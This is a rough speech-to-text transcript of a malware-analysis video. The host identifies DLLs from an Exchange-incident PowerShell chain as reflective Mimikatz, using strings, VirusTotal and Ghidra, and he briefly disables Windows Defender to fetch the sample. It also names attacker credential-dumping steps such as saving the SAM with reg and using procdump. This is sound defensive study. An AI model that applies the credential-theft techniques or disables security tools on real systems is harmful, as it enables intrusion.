throw it into giDRA. Uh, and maybe that's worth a try I I just installed giDRA over on the window side, but I don't know how far I'll be able to drive into that At this point though, we've reached the end of the tunnel where we have a more solid binary so we can kick that over to Um, kick that over to virus total or take it over to like reversing labs or joe's sandbox analysis or any run Whatever whatever whatever we can See if that lights up Any antivirus scanners Let's uh now that we know these are dlls though. Let's move 32 to 32.dll and let's move the des bytes to 64.dll Let me do a quick strings on them before I continue with the performance here Obviously a lot of the default boilerplate nonsense stuff Let's try and trim that down by using strings tack n Like eight or something and let's see if that will kind of minimize the noise No, not not really, but we should hopefully at least have a shorter list here now So we see encrypt references dlls Messages that are kind of included particularly in the compilation here Of course the days of the week as we always see Um I don't know what these really are on off All size true extra full natural left to right full inner across I thought that was kind of spooky. I do see sequel light references though um, and I all see these potential Like data names or field names for like stuff that will be stored in sequel light um Like these ntlm passwords or lm password history etc etc time stamps A lot of api potential function calls And obviously we're just looking at strings, right? So it's not going to be super duper telling we'll fire open it in ghedra just a moment but uh After we kick it to virus total and stuff And then you can see like straight up sequel syntax create table auto increment delete from update table names And It's definitely using a sequel light database for keeping track of stuff Uh, random blob zero blob etc etc etc Too many arguments Is there something more damning here? Oh, here we go Here we end up checking out some cryptography stuff b-crypt n-crypt import key And of course a good old memey cat string Hello Welcome Thank i'm glad you could make it to the party memey cats System flags LSA does that must be something for getting Pouring things out of lsas maybe and of course b-crypt n-crypt all these other functions But look at this. Look at this. Look at this power cats dot dll And reference to power. Oh moving my face again. I get it all the time Move reference to power shell reflective memey cats um We're looking at strings mind you again, so it's hey, this isn't a smoking gun or anything But now that we have a little bit more functionality or an idea as to what this thing might be doing Let's kick it off over to our good friend virus total and uh, see what we got Here we go. Let's go to virus total virus total dot com Once the internet loads i'm waiting on the entire internet to come back for me here. There we go Let's uh upload a file On We had what? My x was the directory that we called it. So 32 bit dot dll Let's fire that one up and 52 add a 70 engines detect this one They're saying yo memey cats memey cats malware malware hack tool Memey cats memey cats memey cats memey cats memey cats dude. It's bloody There is some carnage on this virus total page right here. What does the community say? Yep reflected memey cats Reflected memey cats This is the same person over and over Um, let's try and give it that 64 bit dll 54 out of 70 engines nice memey cats memey cats memey cats memey cats It could be a wrap ladies and gentlemen memey cats rap Once again memey cats reflective all throughout the community of florian again Sweet dude, um So it's bad. I think we can come to that conclusion Uh from what I understand and let's see if we can actually throw it into gidra. Uh, I'll try and see if I can upload this Uh opt htp.server. Yeah What am what is my ip address real quick? Let's get a ip as Ah, I have multiple screens What am I right now locally? I am 17. Can I reach that from my windows vm? Port 8000 please please please. Yeah. All right. Cool. Cool. Cool. Let's download a 64 bit. Let's see if Chrome was cool with it. All right. Nope. I spoke too soon Chrome doesn't like it and defenders probably get a whine on this thing too. Obviously, they'll be like no It's memey cats What are you doing john? Let's uh, let's see if we can get See if we can get him to to shut up real quick. Um Manage settings, please stop defender We have to uh Virus protection is turned off. You might want to turn that back on bucko How did you know? Let's uh copy this and try and w it down. How about that? Let's get to the old desktop here Let's uh, w get because that's an alias in uh In power shell out file 64. Dilo Fingers crossed Please What's happening? Power shell is just hung up on the phone, dude. I have I have no output Do I need to have that earlier like use basic parting should be after Basic parsing Come on Let's do a little let's do a little invoke web request Invoke web request slap What's happening? I'm gonna have to pause the video because I'm just Crumbling at a simple w get command everybody Give me a moment. Okay. I don't really know what happened. It's not gonna lie It just like didn't want to come back So, uh 32 32 Oh, sorry, my face is in the way I just downloaded the files here. They are my desktop. Um, let's see If we can get gija to open them. I am running gija within windows because gija Seemingly to open a windows file within linux It doesn't have like the file system provider to like kind of know what it's doing and I understand You know, sometimes I don't know how to speak in another language either um But I don't know I truth. They have never done this I've never tried to run gija on windows So I have no idea what's going to end up going through It's pretty new project see if we can get anything here and uh non-share project we'll call it gija in lowercase Totally cool. And then let's control i before the internet yells at me that I get that wrong Um to try and explore some of these control i to open up a binary Once again, no file system provider if I drag it in let's see if I figure that one out now Yep, okay, cool. So I have seen that error come up before recently and someone commented on the video The last video where I was trying to use gija and they're like no no no john john No file system provider. It's just some strange thing that happens if you can drag the file in it It does behave. So forgive me on that. I think I commented on the video like please forgive me internet. I'm said truly sorry Uh, but let's see if gija can uh pull it together on this one Taking a sweet time pause the video real quick Okay, it looks good Pulled it in See if we can analyze it Again, I don't know where this is going to go. So this is me Operating at the edge of my understanding See if we can analyze it But I mean if it's just going to end up being memecats the very least we know Hey, it can try and dump passwords and things and credentials out of memory Um, I don't know exactly what this will look like, but we could pour through it there we go entry And it tries to run Based off the parameters here a parameter is one it'll call this thing Which calls other functions and this is kind of hard to see That I know that I would need to increase the font and everything here, but it's all going to end up being stripped um and all of the Virus total stuff that we see does indicate that yo this is uh, and it's not like you can just scan it It's not like you can just open it a thing up in virus total and say oh, it's bad. It says it's bad or it says it's good I'm going to totally ignore it Uh, you got to take that with a grain of salt obviously exploring through it in gidra is something that you can and should do Even if it's just clicking around trying to see what they do like all the functions here Like if we were to look for hey power shall reflect memecats There it goes. It's a function What else do you do? Uh, check out the command line arguments try and allocate memory Uh, what is this guy run thing? Explore it fast calls here Truthfully, I'm out of my element when we get to this point I had a lot more fun with the power shell and when we get to the point or it's like yo, we've got the binary and this Lights up on some community threat intelligence stuff between virus total and all I think that's enough to to call it quits here But opening up the 32 bit and opening up the 64 bit um Files in gidra or examining them does kind of offer the insight like look these look these seem to be Both 64 bit and 32 bit memecats So those could be going to grab credentials and more information um That has been one route in What we've been or I've been uncovering kind of pouring through Exploring and and you can see some of my other work if you google it around But uh all of those other stages as we pour through them are available again through my gist github And uh, this has all been obviously released before so I don't want to be letting the cat out of the bag on anything Or making anyone upset like it's okay. We're trying to all get better We're all trying to get smarter and understand The the post exploitation that might go on or what's happening next year So I've seen other occurrences where Folks are reporting like hey, they're running net.exe commands to add and remove administrators in the exchange group, right? Obviously in the microsoft exchange Incident we're seeing registry commands like reg query reg dump red save to pull down Sam databases or other information. We're seeing proc dump. Obviously now we're seeing memecats to gather information Passwords etc etc Um It's starting it's still coming through it's still but we we need all come together, right? And I say this all too often that It takes a village, you know, we're all trying to share this intelligence as we're gathering So please don't hesitate to offer or join in the fight join in the fun Uh, if there's any iocs that you might want to share or other things we can examine and analyze But I have repeatedly wanted to emphasize my disclaimer and that I'm not A thousand percent positive and I don't guarantee any of this But I wanted to showcase it and drag us through some of that code because I thought it was cool kind of neat. Um I will say none of this goes to say none of this goes to show or none of this says or means like Oh, this is hafnium. No, I can't say that we can't say that we can't say Uh, it is one specific actor or multiple or as it being re-exploited Uh We just don't know I don't know I don't know uh, and I'm not to pretend like I do Uh, I don't want to be in speculation corner, especially when folks are like is this country x y z is this attribution Look, it's bad and we got to get the bad stuff away no matter who made it or what it is or where it came from like Get know the understand that it's evil and then stop the evil. So That's enough of my rant. That's enough of this video, but thank you so much for watching everybody I think we can tune out now. Uh, I really really hope you enjoyed this video I really hope you had some fun with some of the power shell stuff. We were carving through I hope it had some uh real world application to it and that yes, this is a ongoing growing story There's more to come and again, maybe my analysis is totally wrong But it was kind of fun to unravel and pour through those those power shell onions there when we're getting to stage Five to get into stage six with this memecats dll that's loaded in wow Um, there's more to do though. So we're not over yet. It's not over yet. So thanks so much for watching everybody If you enjoyed this video, please do press that like button Please leave a comment below it helps to kind of youtube algorithm engagement stuff So if you're willing to please subscribe for more videos like this I have a lot in the canon and people have been sending me some great malware samples So please do please please please keep it up. Um, please do send along any uh malware samples that you are interested in Or kind of want to take take me to take a look at there's a link or there's my email in the description So please keep sending them along. It's very cool. Very fun. We can keep growing this thing. So uh before I go before I forget I do want to mention quick little uh notion here Yo, nom con nom con is coming up nom con is happening this friday And I want to throw in this pitch before the end of the video Uh because I should have done it at the beginning but then no one would actually watch the video Look if you haven't registered for nom con, I'm hosting the game my guys my team my friends We're all putting this game on we have over like 70 challenges like a ton of challenges for this weekend competition 48 hours, uh that this coming friday to this coming saturday Uh, we have some fantastic sponsors that are offering some sweet sweet prizes I and he has thrown in some incredible stuff. I think red bull is trying to get everyone drinks. It's so so awesome Uh, and we'll be showcasing some other neat challenges. This is all new stuff We're gonna have a ton of fun. So please please please register come play come hang out ctf dot nom con dot com We'll see you this coming friday But we're gonna have a blast and uh, you'll see some challenges a lot like this a lot like this, uh neat malware analysis stuff So, okay, that is the end of the video everybody. Thanks so much for tolerating me. I hope you enjoyed this one I love you. I'll see you in the next one and uh Keep on the fight. We're we're all here to to learn and keep growing. So share it with the community Thanks everybody. I love you. Take care Thank you